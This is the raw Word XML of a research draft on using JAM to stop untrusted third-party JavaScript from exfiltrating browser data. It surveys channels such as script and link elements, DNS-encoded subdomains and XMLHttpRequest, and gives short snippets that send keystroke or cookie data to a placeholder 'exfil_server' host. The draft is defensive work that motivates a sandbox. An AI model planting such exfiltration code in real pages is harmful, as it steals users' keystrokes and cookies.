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E713" w14:textId="0B655050" w:rsidR="00B56BDB" w:rsidRDefault="00EC7C8F" w:rsidP="00D54616">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Preventing </w:t>
      </w:r>
      <w:r w:rsidR="007E784A">
        <w:t>JavaScript Data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Exfiltration</w:t>
      </w:r>
      <w:r w:rsidR="009D4667">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Using JAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A8C029" w14:textId="52C11CBB" w:rsidR="006D28DE" w:rsidRDefault="00CA540D" w:rsidP="005E181F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JavaScript Network </w:t>
      </w:r>
      <w:r w:rsidR="004C3CC7">
        <w:t>Data Exfil</w:t>
      </w:r>
      <w:r w:rsidR="000A3469">
        <w:t>tration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE0C494" w14:textId="77777777" w:rsidR="00CA540D" w:rsidRDefault="00CA540D" w:rsidP="005E181F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C7FF191" w14:textId="77777777" w:rsidR="005316DB" w:rsidRDefault="00CF5DD3" w:rsidP="005E181F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>In the following section, we will consider the situation where</w:t>
      </w:r>
      <w:r w:rsidR="00646FC6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F061F">
        <w:t>untrustworthy third-party</w:t>
      </w:r>
      <w:r w:rsidR="00646FC6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">JavaScript </w:t>
      </w:r>
      <w:r w:rsidR="002A6F1A">
        <w:t xml:space="preserve">is included in an otherwise trusted </w:t>
      </w:r>
      <w:r>
        <w:t>page.   The goal of the malicious script will be to exfiltrate</w:t>
      </w:r>
      <w:r w:rsidR="00646FC6">
        <w:t xml:space="preserve"> data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> collected </w:t>
      </w:r>
      <w:r w:rsidR="00AF0167">
        <w:t>from the client’</w:t>
      </w:r>
      <w:r w:rsidR="00DA4745">
        <w:t xml:space="preserve">s browser, e.g, by logging </w:t>
      </w:r>
      <w:r w:rsidR="00C73321">
        <w:t>keystrokes</w:t>
      </w:r>
      <w:r w:rsidR="00AF0167">
        <w:t>, reading cookies, or reading other DOM elements.</w:t>
      </w:r>
      <w:r w:rsidR="00984E30">
        <w:t xml:space="preserve">  We will refer to the exfilrated data as </w:t>
      </w:r>
      <w:r w:rsidR="00646FC6" w:rsidRPr="00646FC6">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>exfil_msg</w:t>
      </w:r>
      <w:r w:rsidR="00984E30">
        <w:t xml:space="preserve"> and the server to which the exfiltrated data is </w:t>
      </w:r>
      <w:r w:rsidR="006605DF">
        <w:t>sent</w:t>
      </w:r>
      <w:r w:rsidR="00984E30">
        <w:t xml:space="preserve"> as the </w:t>
      </w:r>
      <w:r w:rsidR="00EE33B2" w:rsidRPr="00EE33B2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>exfil_server</w:t>
      </w:r>
      <w:r w:rsidR="00EE33B2">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00984E30">
        <w:t xml:space="preserve">  Note that as discussed in [1] </w:t>
      </w:r>
      <w:r w:rsidR="00984E30" w:rsidRPr="00EE33B2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>exfil_server</w:t>
      </w:r>
      <w:r w:rsidR="00984E30">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00984E30">
        <w:t xml:space="preserve">does not necessarily </w:t>
      </w:r>
      <w:r w:rsidR="001230FF">
        <w:t>need to</w:t>
      </w:r>
      <w:r w:rsidR="006B16D1">
        <w:t xml:space="preserve"> be a ma</w:t>
      </w:r>
      <w:r w:rsidR="0099407A">
        <w:t xml:space="preserve">licious or untrustworthy site.  In fact, it does not even need to be different than the site hosting the page.  </w:t>
      </w:r>
      <w:r w:rsidR="003B641B">
        <w:t>An example, given in [1] is a malicious script injected into an auction site that steals a user Alice’s cookie and posts it in the comments section of her own auction page.</w:t>
      </w:r>
      <w:r w:rsidR="00C3272B">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00A319C2">
        <w:t xml:space="preserve">The authors </w:t>
      </w:r>
      <w:r w:rsidR="00B22902">
        <w:t xml:space="preserve">call this technique self-exfiltration and observe that any </w:t>
      </w:r>
      <w:r w:rsidR="003A2886">
        <w:t>techniques based on target destination whitelists are</w:t>
      </w:r>
      <w:r w:rsidR="00B22902">
        <w:t xml:space="preserve"> susceptible to self-exfiltration.</w:t>
      </w:r>
      <w:r w:rsidR="006C41A1">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2877AB43" w14:textId="77777777" w:rsidR="005316DB" w:rsidRDefault="005316DB" w:rsidP="005E181F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="227ED2C9" w14:textId="23952379" w:rsidR="006B16D1" w:rsidRPr="00984E30" w:rsidRDefault="00C42F88" w:rsidP="005E181F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00DA77D9">
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">propose using JAM to </w:t>
      </w:r>
      <w:r w:rsidR="00EE205E">
        <w:t xml:space="preserve">block </w:t>
      </w:r>
      <w:r w:rsidR="005316DB">
        <w:t xml:space="preserve">network access </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">included </w:t>
      </w:r>
      <w:r w:rsidR="000D1559">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00052A46">
        <w:t>so-</w:t>
      </w:r>
      <w:r>
        <w:t>called whitelisted sites for certain untrustworthy scripts</w:t>
      </w:r>
      <w:r w:rsidR="000813F8">
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="00F47F7D">
        <w:t xml:space="preserve">Such a sandbox is useful when it is known that the </w:t>
      </w:r>
      <w:r w:rsidR="00FC4311">
        <w:t>script being sandbox</w:t>
      </w:r>
      <w:r w:rsidR="001A356F">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00FC4311">
        <w:t xml:space="preserve"> does not need </w:t>
      </w:r>
      <w:r w:rsidR="007F6AC7">
        <w:t xml:space="preserve">any </w:t>
      </w:r>
      <w:r w:rsidR="00FC4311">
        <w:t>network access</w:t>
      </w:r>
      <w:r w:rsidR="00A3266C">
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="00296C3A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF32F8">
        <w:t xml:space="preserve">For example consider a </w:t>
      </w:r>
      <w:r w:rsidR="005E750E">
        <w:t>bar</w:t>
      </w:r>
      <w:r w:rsidR="00AC0F49">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D338AA">
        <w:t>code processing</w:t>
      </w:r>
      <w:r w:rsidR="000E1A91">
        <w:t xml:space="preserve"> library </w:t>
      </w:r>
      <w:r w:rsidR="00EC45D6">
        <w:t>that does not</w:t>
      </w:r>
      <w:r w:rsidR="005307F9">
        <w:t xml:space="preserve"> interact with the network or pull in other scripts.</w:t>
      </w:r>
      <w:r w:rsidR="00EF32F8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E239E2" w14:textId="77777777" w:rsidR="00CA540D" w:rsidRDefault="00232F98" w:rsidP="005E181F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>DOM elements with src attribute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B76211" w14:textId="77777777" w:rsidR="00A4589B" w:rsidRPr="00A4589B" w:rsidRDefault="00A4589B" w:rsidP="005E181F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30C8C367" w14:textId="2C5365EE" w:rsidR="00A4589B" w:rsidRPr="00C50012" w:rsidRDefault="003E5D01" w:rsidP="005E181F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Data can be exfiltrated by adding a </w:t>
      </w:r>
      <w:r w:rsidR="00A4589B">
        <w:t>DOM element with “src” attribute set</w:t>
      </w:r>
      <w:r w:rsidR="006212FB">
        <w:t xml:space="preserve"> with</w:t>
      </w:r>
      <w:r w:rsidR="00AE7DAC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE7DAC" w:rsidRPr="006212FB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>exfil_msg</w:t>
      </w:r>
      <w:r w:rsidR="00AE7DAC">
        <w:t xml:space="preserve"> contained in the URL</w:t>
      </w:r>
      <w:r w:rsidR="004F3351">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001B1FFC">
        <w:t xml:space="preserve">  The malicious server upon receiving the resulting HTTP request can extract </w:t>
      </w:r>
      <w:r w:rsidR="001B1FFC" w:rsidRPr="001B1FFC">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>exfil_msg</w:t>
      </w:r>
      <w:r w:rsidR="001B1FFC">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C50012">
        <w:t xml:space="preserve">  The “src” attribute can be set for DOM elements such as a </w:t>
      </w:r>
      <w:r w:rsidR="00C50012" w:rsidRPr="00C50012">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidR="00C50012">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C50012" w:rsidRPr="00C50012">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:r w:rsidR="00C50012">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C50012" w:rsidRPr="00C50012">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>image</w:t>
      </w:r>
      <w:r w:rsidR="00C50012">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C50012" w:rsidRPr="00C50012">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00C50012">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> video</w:t>
      </w:r>
      <w:r w:rsidR="00C50012">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FB5CE4" w14:textId="1251427A" w:rsidR="00BC7701" w:rsidRDefault="00FF14B6" w:rsidP="005E18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8069E" wp14:editId="47F04332">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>342900</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="50292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3877" w14:textId="77777777" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00FF14B6">
                            <w:r>
                              <w:t xml:space="preserve">    var script = document.createElement('script');</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7BA333F3" w14:textId="43E56F28" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00FF14B6">
                            <w:r>
                              <w:t xml:space="preserve">    script.src = http://exfil_server/exfil_message</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0010ECCD" w14:textId="3F0CE1E5" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00FF14B6">
                            <w:r>
                              <w:t xml:space="preserve">    document.body.appendChild( script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pt;margin-top:14.4pt;width:39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" fillcolor="#dbe5f1 [660]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="76A03877" w14:textId="77777777" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00FF14B6">
                      <w:r>
                        <w:t xml:space="preserve">    var script = document.createElement('script');</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7BA333F3" w14:textId="43E56F28" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00FF14B6">
                      <w:r>
                        <w:t xml:space="preserve">    script.src = http://exfil_server/exfil_message</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0010ECCD" w14:textId="3F0CE1E5" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00FF14B6">
                      <w:r>
                        <w:t xml:space="preserve">    document.body.appendChild( script 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5C6CF" w14:textId="2228CD1B" w:rsidR="000A3469" w:rsidRDefault="000A3469" w:rsidP="005E181F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E9A5EAA" w14:textId="77777777" w:rsidR="000A3469" w:rsidRDefault="000A3469" w:rsidP="005E181F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D5B0B7A" w14:textId="77777777" w:rsidR="00FF14B6" w:rsidRDefault="00FF14B6" w:rsidP="005E181F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20CC2FF0" w14:textId="77777777" w:rsidR="00FF14B6" w:rsidRDefault="00FF14B6" w:rsidP="005E181F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D269213" w14:textId="77777777" w:rsidR="00366AAF" w:rsidRDefault="00366AAF" w:rsidP="005E181F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BCD0B31" w14:textId="5285F23D" w:rsidR="00A02FA5" w:rsidRDefault="00366AAF" w:rsidP="005E181F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Modifying</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> an existing DOM element’s “src” attribute also gives the some results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCDBD65" w14:textId="4D7C0DD1" w:rsidR="003E0BEF" w:rsidRPr="003E0BEF" w:rsidRDefault="003106DF" w:rsidP="005E18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DC437" wp14:editId="2B2AE90A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5029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B7D2" w14:textId="77777777" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00366AAF">
                            <w:r>
                              <w:t xml:space="preserve">    var script = document.createElement('script');</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6DEED4F9" w14:textId="77777777" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00366AAF">
                            <w:r>
                              <w:t xml:space="preserve">    document.body.appendChild( script );</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="42E49D1F" w14:textId="78666DDB" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00366AAF">
                            <w:r>
                              <w:t xml:space="preserve">    script.src = http://exfil_server/exfil_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pt;margin-top:20pt;width:39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" fillcolor="#dbe5f1 [660]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1941B7D2" w14:textId="77777777" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00366AAF">
                      <w:r>
                        <w:t xml:space="preserve">    var script = document.createElement('script');</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6DEED4F9" w14:textId="77777777" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00366AAF">
                      <w:r>
                        <w:t xml:space="preserve">    document.body.appendChild( script );</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="42E49D1F" w14:textId="78666DDB" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00366AAF">
                      <w:r>
                        <w:t xml:space="preserve">    script.src = http://exfil_server/exfil_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ADD81" w14:textId="77777777" w:rsidR="003106DF" w:rsidRDefault="003106DF" w:rsidP="005E181F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75507288" w14:textId="77777777" w:rsidR="003106DF" w:rsidRDefault="003106DF" w:rsidP="005E181F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A46AEFD" w14:textId="77777777" w:rsidR="003106DF" w:rsidRDefault="003106DF" w:rsidP="005E181F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="244D7232" w14:textId="0A16D3FC" w:rsidR="00207218" w:rsidRPr="0028761E" w:rsidRDefault="0028761E" w:rsidP="005E181F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0028761E">
        <w:lastRenderedPageBreak/>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="00207218">
        <w:t xml:space="preserve"> above two examples assume </w:t>
      </w:r>
      <w:r w:rsidR="00E15EC7">
        <w:t xml:space="preserve">a malicious web server.  A variation of the attack can also be done by assuming a malicious DNS server.  </w:t>
      </w:r>
      <w:r w:rsidR="005914B1">
        <w:t>In this version of the attack the src attribute is set to something like, “</w:t>
      </w:r>
      <w:r w:rsidR="005914B1" w:rsidRPr="00F05575">
        <w:t>http://exfil_msg.exfil_server.com</w:t>
      </w:r>
      <w:r w:rsidR="005914B1">
        <w:t>”.   Care</w:t>
      </w:r>
      <w:r w:rsidR="006A2AB5">
        <w:t xml:space="preserve"> must be taken </w:t>
      </w:r>
      <w:r w:rsidR="00727BD2">
        <w:t xml:space="preserve">by the attacker </w:t>
      </w:r>
      <w:r w:rsidR="006A2AB5">
        <w:t>to ensure that exfil_msg is encoded such that only characters acceptable in a DNS query are used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B55BF89" w14:textId="7546F711" w:rsidR="000C7CE6" w:rsidRDefault="000C7CE6" w:rsidP="005E181F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A36CDC">
        <w:t>DOM elements with href attribute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F51DD86" w14:textId="77777777" w:rsidR="00FE4F27" w:rsidRDefault="00FE4F27" w:rsidP="005E181F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18DC7921" w14:textId="70F6562D" w:rsidR="00B76B16" w:rsidRDefault="00AD6B62" w:rsidP="005E181F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Data can be exfiltrated using a DOM element’s “href” attribute similar to how a “src” attribute is used</w:t>
      </w:r>
      <w:r w:rsidR="00557AA0">
        <w:t xml:space="preserve"> for anchor and link elements.  </w:t>
      </w:r>
      <w:r w:rsidR="00895D0A">
        <w:t xml:space="preserve">Links </w:t>
      </w:r>
      <w:r w:rsidR="00D821DD">
        <w:t>may</w:t>
      </w:r>
      <w:r w:rsidR="00895D0A">
        <w:t xml:space="preserve"> require </w:t>
      </w:r>
      <w:r w:rsidR="00D821DD">
        <w:t xml:space="preserve">the user to do some action such as click on them in order to be activated, but this is not always the case.  </w:t>
      </w:r>
      <w:r w:rsidR="00C956BB">
        <w:t xml:space="preserve">For example, a </w:t>
      </w:r>
      <w:r w:rsidR="00C956BB" w:rsidRPr="00C956BB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>link</w:t>
      </w:r>
      <w:r w:rsidR="00C956BB">
        <w:t xml:space="preserve"> element </w:t>
      </w:r>
      <w:r w:rsidR="001D61CC">
        <w:t xml:space="preserve">to a css file </w:t>
      </w:r>
      <w:r w:rsidR="0044649C">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="001D61CC">
        <w:t xml:space="preserve">automatically </w:t>
      </w:r>
      <w:r w:rsidR="0044649C">
        <w:t>queried without</w:t>
      </w:r>
      <w:r w:rsidR="00071969">
        <w:t xml:space="preserve"> user interaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245DEBE6" w14:textId="7B8C1E9C" w:rsidR="00B76B16" w:rsidRDefault="00B76B16" w:rsidP="005E181F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="422FA142" w14:textId="497F2E86" w:rsidR="00B76B16" w:rsidRPr="00C956BB" w:rsidRDefault="00853561" w:rsidP="005E18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61E3B" wp14:editId="76F2F4D9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>342900</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>13970</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="50292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84A1" w14:textId="2E073E0F" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00D12879">
                            <w:r>
                              <w:t xml:space="preserve">    var link = document.createElement(‘link’);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="28DAD767" w14:textId="68F9AB7F" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00D12879">
                            <w:r>
                              <w:t xml:space="preserve">    document.body.appendChild( link );</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6E8645C2" w14:textId="661D7C3D" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00D12879">
                            <w:r>
                              <w:t xml:space="preserve">    link.href = </w:t>
                            </w:r>
                            <w:hyperlink r:id="rId6" w:history="1">
                              <w:r w:rsidRPr="00CC7BB1">
                                <w:rPr>
                                  <w:rStyle w:val="Hyperlink"/>
                                </w:rPr>
                                <w:t>http://exfil_server/exfil_message</w:t>
                              </w:r>
                            </w:hyperlink>
                          </w:p>
                          <w:p w14:paraId="3B49B958" w14:textId="77777777" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00853561">
                            <w:r>
                              <w:t xml:space="preserve">    link.rel = "stylesheet"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="379F369F" w14:textId="16582D0D" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00853561">
                            <w:r>
                              <w:t xml:space="preserve">    link.type = "test/cs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pt;margin-top:1.1pt;width:396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" fillcolor="#dbe5f1 [660]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="26C684A1" w14:textId="2E073E0F" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00D12879">
                      <w:r>
                        <w:t xml:space="preserve">    var link = document.createElement(‘link’);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="28DAD767" w14:textId="68F9AB7F" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00D12879">
                      <w:r>
                        <w:t xml:space="preserve">    document.body.appendChild( link );</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6E8645C2" w14:textId="661D7C3D" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00D12879">
                      <w:r>
                        <w:t xml:space="preserve">    link.href = </w:t>
                      </w:r>
                      <w:hyperlink r:id="rId7" w:history="1">
                        <w:r w:rsidRPr="00CC7BB1">
                          <w:rPr>
                            <w:rStyle w:val="Hyperlink"/>
                          </w:rPr>
                          <w:t>http://exfil_server/exfil_message</w:t>
                        </w:r>
                      </w:hyperlink>
                    </w:p>
                    <w:p w14:paraId="3B49B958" w14:textId="77777777" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00853561">
                      <w:r>
                        <w:t xml:space="preserve">    link.rel = "stylesheet"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="379F369F" w14:textId="16582D0D" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00853561">
                      <w:r>
                        <w:t xml:space="preserve">    link.type = "test/css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6FC33" w14:textId="3D33BD04" w:rsidR="005D536B" w:rsidRDefault="005D536B" w:rsidP="005E181F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>XMLHTTPRequest</w:t>
      </w:r>
      <w:r w:rsidR="0034647A">
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47997C6D" w14:textId="77777777" w:rsidR="005D536B" w:rsidRDefault="005D536B" w:rsidP="005E181F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5763B67A" w14:textId="2D619226" w:rsidR="005D536B" w:rsidRPr="005D536B" w:rsidRDefault="005D536B" w:rsidP="005E181F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Data can be exfiltrated using an XMLHTTPRequest as depicted below.  Browsers implement a same origin policy</w:t>
      </w:r>
      <w:r w:rsidR="00AD1786">
        <w:t xml:space="preserve"> for XMLHTTPRequests</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AD1786">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">prevents </w:t>
      </w:r>
      <w:r w:rsidR="00AD1786">
        <w:t>data from being received from a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AD1786">
        <w:t>different origin server but not from being sent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23512CA2" w14:textId="6349BFF6" w:rsidR="009C3E6C" w:rsidRDefault="009C3E6C" w:rsidP="005E18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16927" wp14:editId="1F563110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5029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895C" w14:textId="4D408BBC" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00786C5B">
                            <w:r>
                              <w:t xml:space="preserve">    xmlhttp= new XMLHttpRequest();</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="725B41E5" w14:textId="77777777" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00786C5B">
                            <w:r>
                              <w:t xml:space="preserve">    xmlhttp.open('GET', gen_exfil_url(key_history, 'xmlhttp request'), true);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="62387000" w14:textId="31FBE63A" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00786C5B">
                            <w:r>
                              <w:t xml:space="preserve">    xmlhttp.send(nul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7pt;margin-top:13.25pt;width:39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" fillcolor="#dbe5f1 [660]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="100D895C" w14:textId="4D408BBC" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00786C5B">
                      <w:r>
                        <w:t xml:space="preserve">    xmlhttp= new XMLHttpRequest();</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="725B41E5" w14:textId="77777777" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00786C5B">
                      <w:r>
                        <w:t xml:space="preserve">    xmlhttp.open('GET', gen_exfil_url(key_history, 'xmlhttp request'), true);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="62387000" w14:textId="31FBE63A" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00786C5B">
                      <w:r>
                        <w:t xml:space="preserve">    xmlhttp.send(null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A1379" w14:textId="77777777" w:rsidR="009C3E6C" w:rsidRDefault="009C3E6C" w:rsidP="005E181F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7539F3E0" w14:textId="77777777" w:rsidR="009C3E6C" w:rsidRDefault="009C3E6C" w:rsidP="005E181F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B4DE05F" w14:textId="77777777" w:rsidR="009C3E6C" w:rsidRDefault="009C3E6C" w:rsidP="005E181F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4985D1B5" w14:textId="77777777" w:rsidR="00F279D5" w:rsidRDefault="00F279D5" w:rsidP="005E181F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05A56A11" w14:textId="04E71C25" w:rsidR="009C3E6C" w:rsidRDefault="00EF69B5" w:rsidP="005E181F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>WebSockets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642763A1" w14:textId="6103A124" w:rsidR="00BC7701" w:rsidRDefault="00BC7701" w:rsidP="005E181F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
